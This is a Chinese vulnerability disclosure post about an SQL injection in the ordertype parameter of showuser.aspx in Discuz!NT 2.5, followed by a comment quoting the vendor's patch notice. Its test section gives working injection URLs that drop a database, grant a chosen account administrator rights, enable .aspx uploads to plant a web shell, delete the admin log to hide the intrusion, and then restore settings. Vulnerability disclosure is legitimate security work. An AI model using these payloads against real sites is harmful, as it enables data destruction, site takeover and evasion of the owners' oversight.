Discuz!NT 2.5(20080826更新前)注入

来源:ISTO

漏洞说明:Discuz!NT 2.5 是康盛创想(北京)科技有限公司旗下的一款功能强大的基于 ASP.net 平台的社区软件。基于先进的 .Net Framework,默认支持 SQLServer数据库,可扩展支持Access、MySQL等多种数据库,支持IIS5、IIS6、IIS7,安全高效、稳定易用,充分发挥 ASP.net 特性,支持自由选择切换皮肤,支持多种其它论坛的数据转换。
Discuz!NT 2.5 强化论坛功能,提高速度和稳定性,负载能力也有显著改善,在此基础上还将提供包括商品交易、空间、相册等强大功能的插件包,供用户自由选择安装,体现出强大的伸缩扩展性。无论是从功能、性能,还是从支持环境等角度来看,都是目前最为完善和成熟 ASP.net 社区软件。但是ISTO成员在其中发现了一个安全漏洞,成功利用此漏洞可以直接修改管理员的密码进入后台,取得管理员权限,从而控制整个网站。

漏洞厂商:http://www.comsenz.com

漏洞解析:在 Discuz!NT 2.5(20080826更新前)版本中showuser.aspx页面由于对ordertype变量没处理好!导致SQL注入,恶意攻击用户甚至不用注册账户,只要精心构造ordertype即可利用此漏洞。

漏洞测试:
http://www.*.com/bbs/showuser.aspx?ordertype=desc;drop database kj;–

http://www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_users set adminid=’1′,groupid=’1′ where username=’webtets’;–//更新为管理员

http://www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_attachtypes set extension=’aspx’ where extension=’jpg’;– //更新为aspx可上传

得到SHELL后…

http://www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_attachtypes set extension=’jpg’ where extension=’aspx’;– //更新回JPG

http://www.*.com/bbs/showuser.aspx?ordertype=desc;delete from dnt_adminvisitlog where username=’webtets’;– //删除日志

http://www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_users set adminid=”,groupid=” where username=’webtets’;–//取消管理员

相关日志

抢楼还有机会... 抢座Rss 2.0或者 Trackback

  • bryan

    Discuz!NT 2.5 重要更新 【20080826】
    2.5版本修改showuser页面逻辑的一个错误造成了安全问题,恶意用户可能通过此漏洞对论坛发起攻击。为此我们强烈建议您立即下载补丁进行修补。
    补丁下载地址:
    http://download.comsenz.com/DiscuzNT/patch/dnt_25_n2_patch20080826.zip

    修正方法:
    1. 解开压缩包
    2. 将压缩包中的Discuz.Web.dll文件上传到bin目录,覆盖掉以前的文件。
    3. 如果安装了空间插件,请将压缩包中的Discuz.space.dll文件上传到bin目录,覆盖掉以前的文件。否则请勿上传该文件!

    注:已经同步更新所有的下载包和源码包,具体修改的文件过几天公布。

    mysql和access版的测试用户也请更新此补丁。

发表评论